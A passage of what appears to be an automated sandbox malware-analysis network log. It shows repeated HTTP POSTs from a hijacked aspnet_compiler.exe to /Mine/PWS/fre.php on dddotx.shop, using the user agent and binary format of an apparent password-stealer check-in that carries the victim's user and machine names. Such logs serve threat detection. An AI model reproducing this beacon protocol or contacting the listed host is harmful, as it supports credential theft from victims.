                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URi8w8bwwL4koeUv%2FYGuYMoE7NlwBOsfD5HUCry5zBLpeTMEAKVcR8KZabIw1Cl0dUfRj4Zg%2Fz%2B0B9uTn9eHGVT66fLcK8NkORlhi3tQiZSpWZ8x0V8RChRpeV18Qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada671d0b2fdc-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      48192.168.2.550025188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:21.966496944 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:21.973153114 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:23.173033953 CEST780INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:23 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZAKx2Yw68A5Tn2NQ8gDz%2Basu58%2BVjpuZCY%2BUfRvrZ6FR9lryFYhk39R4K4Cw%2BXnaEkQUA7Ba5u4yBJjk0e5nvnHPdV1FlcWzxP6HL8%2F10HWLt72l%2FAs17MFfFmpPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada6dab6e6b5b-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1882&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      49192.168.2.550026188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:23.319847107 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:23.325611115 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:24.271332979 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:24 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbomeqce6xggmjjX5oK1szsV7VWp%2FZH%2BxF81mAqghIp8ZTsvxy3cz0XKfqgqe68syYxqKu%2BRCKnWAVx3mzmefB8tadmD9V%2FHkS7N6TcLnhYV6as1gphbiukbS5PG6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada7618dc465c-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      50192.168.2.550027188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:24.415819883 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:24.421551943 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:26.405299902 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pEKBl8uyv2kO%2FbYI7NA7EdUYBqSfE7akentiVlZFbLsptxDfBEB%2FAAVmwQmk3r2QQd0IYJKiuhD401huKJ9RwIZcAftuMrnWdneAE7Kl%2B%2FNq7yjxbwIvWXHqTtscrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada7d3bca3ac4-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      51192.168.2.550028188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:26.566142082 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:26.571665049 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:29.670588970 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEQo5emQw2osqdRyOMFO0Hdr%2Fx46iNWx6ruwmf%2FcWoBoGOXHQyaanl2vzOuhIyncfAmFvI5cOanErPFoHvNhwNh62Ar6KyjkcfRJvfvx4Oysm4nzrGPfPdoJvSqBLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada8a6a234757-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1238&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      52192.168.2.550029188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:29.949460983 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:29.956285000 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:30.974685907 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:30 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53UoM9TZDZ5P4vSHYRHpQXGjB7ycjUl2WabI3sV5SzZifxyJ6fSV8B3znhxp%2BxFMUAEokx%2FtkiC80NrdZC0KuU%2BLLPcVAB72HjCa2v%2B2pOKp8I12CIVY6Pal2iAMBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada9f98eae96e-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1401&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      53192.168.2.550030188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:31.126353025 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:31.134751081 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:32.096904039 CEST777INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:32 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nIPXRH24tmkWLVMfYjNnVn7AP2DtbRqy8%2F9aCwnTmm6COYwuiN%2F6n5bJQEnJ7qi6L%2FlLTYiOqn%2BCE%2Btbbh1yyfharJrZvxVdQuCKwphs6itfy6Gr3O51rgyFMJ74RA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adaa71fe43ad0-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1321&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=74&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      54192.168.2.550031188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:32.256139040 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:32.261893034 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:33.257147074 CEST770INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OHuJdcwKj988xBjxnpLVZjMYvLyH1fDaGolI%2B7Qp3DWekDJug6sgjzSSudcwX2nE2EoWgx7BFZBiUdz2WND9wLIWmrGUuTjKQtPOig7dBAuota3lvqvGmlY2AiPQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adaadeb1ee926-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1106&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      55192.168.2.550032188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:33.459758997 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:33.465688944 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:34.906884909 CEST782INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhJXDEKBhNkC%2Bgvm8EJsAvNS0%2FLPpSAwULwrWuA01NlXDJgqyDLZl88kGprTU8DOW5IfQGSHptGIhLrXQIMUtCysnlxF%2FRpMYbQhD%2FB6sDDEHh%2B%2FmrcNWF3A2sfA%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adab589bf478a-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1290&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      56192.168.2.550033188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:35.053550005 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:35.059299946 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:36.731468916 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:36 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ec4v7cdsj9R7lJkSwshjm2sBzz0Yi3SqhlCd2dYWVSmxitBjtqDvl7McAuTUCe6SWa6zlUHaW3PBNhDVhPvAOko1%2BVHDFaKEbxEaLgB77mV%2Fk9D4fiUPkdtIIBygsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adabf6a15e82f-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1457&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      57192.168.2.550034188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:36.881917953 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:36.887346983 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:38.767467022 CEST780INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:38 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLaykezu7Zz0z2O%2FoypISLitca3YiOdR%2FRaPUBmpn10UxgXOQ2%2FEc1RI72cUF7DXb%2BsUDvZ%2BOQiibwkWN%2FQ8QvMxSJSxJX3keTyIBHxe1SLhp0js7Nga3F2nb5pbDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adacad8aaead9-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1331&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      58192.168.2.550035188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:38.916393995 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:38.921832085 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:40.378551006 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:40 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aokre7JlNsIawmJyupBwGeDMFWPy9J4ZT2d4CbPbHagYmspz8noRggwSRTKFUu0yLZ73kcgkmvx4bs1Gvi9faLl6UYZJX3d%2B8oIYmzPS31LwB4HrPFyAlycRod0%2F%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adad7af6a4774-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      59192.168.2.550036188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:40.522819996 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:40.765352964 CEST393OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:40.811482906 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:41.723603010 CEST782INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:41 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUAhUd8ttVOU9iQmDkVjviHt%2FXF1690rNHiGhdwfbCrcYgX9qWBqhnqrF0%2BHt09zNJl3%2FK1%2Fasm2U4Es%2BWEIyfwDoGFLhnERXNZSKclB%2BV%2FuLd0oh0qHz2J5NvF3EQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
